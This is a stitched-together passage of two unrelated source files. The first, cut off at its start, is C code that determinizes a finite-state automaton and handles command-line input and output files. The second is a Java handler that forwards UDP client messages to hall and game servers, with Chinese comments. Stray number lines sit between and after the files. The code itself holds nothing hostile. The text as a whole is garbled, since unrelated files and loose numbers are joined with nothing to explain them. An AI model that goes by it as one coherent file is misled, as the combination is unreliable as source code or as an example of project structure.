generated, register it as new */ #ifdef DEBUG printf("\tNEW\n"); #endif stest->next = root; root = stest; stmp = stest; } else { /* already generated, just point to it */ #ifdef DEBUG printf("\tFOUND\n"); #endif sfree(stest); } /* add arc to the destination state set to "src" */ sac = (STATEQ_ARC *)malloc(sizeof(STATEQ_ARC)); sac->label = t; sac->to = stmp; sac->next = src->ac; src->ac = sac; } src->checked = 1; modified = 1; #ifdef DEBUG printf("====result====\n"); sput(src); printf("==============\n"); #endif } } while (modified == 1); /* annotate ID and count number of nodes */ /* Also, force the state number of initial nodes to 0 by Julian requirement */ nodenum = 1; for(src=root;src;src=src->next) { if (src->start == 1) { src->id = 0; } else { src->id = nodenum++; } for(i=0;i<src->len;i++) { if (src->s[i] == 1) { if (dfa->st[i].status & ACCEPT_S) { src->end = 1; } } } } /* output the result in DFA form */ slist = (STATEQ **)malloc(sizeof(STATEQ *) * nodenum); for(src=root;src;src=src->next) slist[src->id] = src; arcnum = 0; for(i=0;i<nodenum;i++) { src = slist[i]; t = 0; if (src->end == 1) t = 1; for(sac=src->ac;sac;sac=sac->next) { if (t == 1) { fprintf(fpout, "%d %d %d 1 0\n", src->id, sac->label, sac->to->id); t = 0; } else { fprintf(fpout, "%d %d %d 0 0\n", src->id, sac->label, sac->to->id); } arcnum++; } if (t == 1) { fprintf(fpout, "%d -1 -1 1 0\n", src->id); } } free(slist); /* output status to stderr */ fprintf(stderr, "-> determinized: %d nodes, %d arcs\n", nodenum, arcnum); /* free work area */ src = root; while(src) { stmp = src->next; sfree(src); src = stmp; } free(tlist); return TRUE; } /************************************************************************/ /** * Main function. * * @param argc [in] number of command argument * @param argv [in] array of command arguments * * @return -1 on failure, 0 on success */ int main(int argc, char *argv[]) { FILE *fp, *fpout; char *infile, *outfile; int i; /* option parsing */ infile = NULL; outfile = NULL; for(i=1;i<argc;i++) { if (argv[i][0] == '-') { switch(argv[i][1]) { case 'h': usage(); return -1; break; case 'o': if (++i >= argc) { usage(); return -1; } outfile = argv[i]; break; default: fprintf(stderr, "invalid option: %s\n", argv[i]); usage(); return -1; } } else { infile = argv[i]; } } /* open files */ if (infile != NULL) { if ((fp = fopen(infile, "r")) == NULL) { fprintf(stderr, "Error: cannot open \"%s\"\n", infile); return -1; } } else { fp = stdin; } if (outfile != NULL) { if ((fpout = fopen(outfile, "w")) == NULL) { fprintf(stderr, "Error: cannot open \"%s\" for writing\n", outfile); return -1; } } else { fpout = stdout; } /* read in a DFA file */ dfa = dfa_info_new(); if (!myrddfa(fp, dfa)) { fprintf(stderr, "Failed to read DFA from "); if (infile) printf("\"%s\"\n", infile); else printf("stdin\n"); } if (fp != stdin) fclose(fp); fprintf(stderr, "%d categories, %d nodes, %d arcs\n", dfa->term_num, dfa->state_num, dfa->arc_num); /* do determinization */ if (determinize(dfa, fpout) == FALSE) { fprintf(stderr, "Error in determinization\n"); return -1; } if (fpout != stdout) { fclose(fpout); } return 0; }
4,197
1,082
package com.jzy.game.gate.server.handler; import org.apache.mina.core.session.IdleStatus; import org.apache.mina.core.session.IoSession; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import com.jzy.game.engine.mina.config.MinaServerConfig; import com.jzy.game.engine.mina.handler.ClientProtocolHandler; import com.jzy.game.engine.script.ScriptManager; import com.jzy.game.engine.server.Service; import com.jzy.game.engine.util.MsgUtil; import com.jzy.game.gate.script.IUserScript; import com.jzy.game.gate.struct.UserSession; import com.jzy.game.model.constant.Config; import com.jzy.game.model.constant.Reason; /** * udp消息处理器 * @author JiangZhiYong * @QQ 359135103 * 2017年9月1日 下午2:06:36 */ public class GateUdpUserServerHandler extends ClientProtocolHandler{ private static final Logger LOGGER = LoggerFactory.getLogger(GateUdpUserServerHandler.class); public GateUdpUserServerHandler() { super(8); } public GateUdpUserServerHandler(Service<MinaServerConfig> service){ this(); this.service=service; } /** * 消息转发到大厅服或游戏服务器 * * @param bytes * 前8字节分别为消息ID、protobuf长度 */ @Override protected void forward(IoSession session, int msgID, byte[] bytes) { // 转发到大厅服 if (msgID < Config.HALL_MAX_MID) { forwardToHall(session, msgID, bytes); return; } // 转发到游戏服 Object attribute = session.getAttribute(Config.USER_SESSION); if (attribute != null) { UserSession userSession = (UserSession) attribute; if (userSession.getRoleId() > 0) { if (userSession.sendToGame(MsgUtil.clientToGame(msgID, bytes))) { return; } else { LOGGER.warn("角色[{}]没有连接游戏服务器,消息{}发送失败", userSession.getRoleId(),msgID); return; } } } LOGGER.warn("{}消息[{}]未找到玩家", MsgUtil.getIp(session), msgID); } /** * 消息转发到大厅服务器 * * @author JiangZhiYong * @QQ 359135103 2017年7月21日 上午10:14:44 * @param session * @param msgID * @param bytes */ private void forwardToHall(IoSession session, int msgID, byte[] bytes) { Object attribute = session.getAttribute(Config.USER_SESSION); if (attribute != null) { UserSession userSession = (UserSession) attribute; if (userSession.getRoleId() > 0) { if (!userSession.sendToHall(MsgUtil.clientToGame(msgID, bytes))) { LOGGER.warn("角色[{}]没有连接大厅服务器", userSession.getRoleId()); return; } } } LOGGER.warn("[{}]消息未找到对应的处理方式", msgID); } @Override public Service<MinaServerConfig> getService() { return service; } @Override public void sessionOpened(IoSession session) { super.sessionOpened(session); // UserSession userSession = new UserSession(session); // session.setAttribute(Config.USER_SESSION, userSession); //TODO } @Override public void sessionClosed(IoSession session) { super.sessionClosed(session); // ScriptManager.getInstance().getBaseScriptEntry().executeScripts(IUserScript.class, // script -> script.quit(session, Reason.SessionClosed)); session.closeNow(); //TODO ? } @Override public void sessionIdle(IoSession session, IdleStatus idleStatus) { super.sessionIdle(session, idleStatus); // ScriptManager.getInstance().getBaseScriptEntry().executeScripts(IUserScript.class, // script -> script.quit(session, Reason.SessionIdle)); session.closeNow(); //TODO ? } }
1,576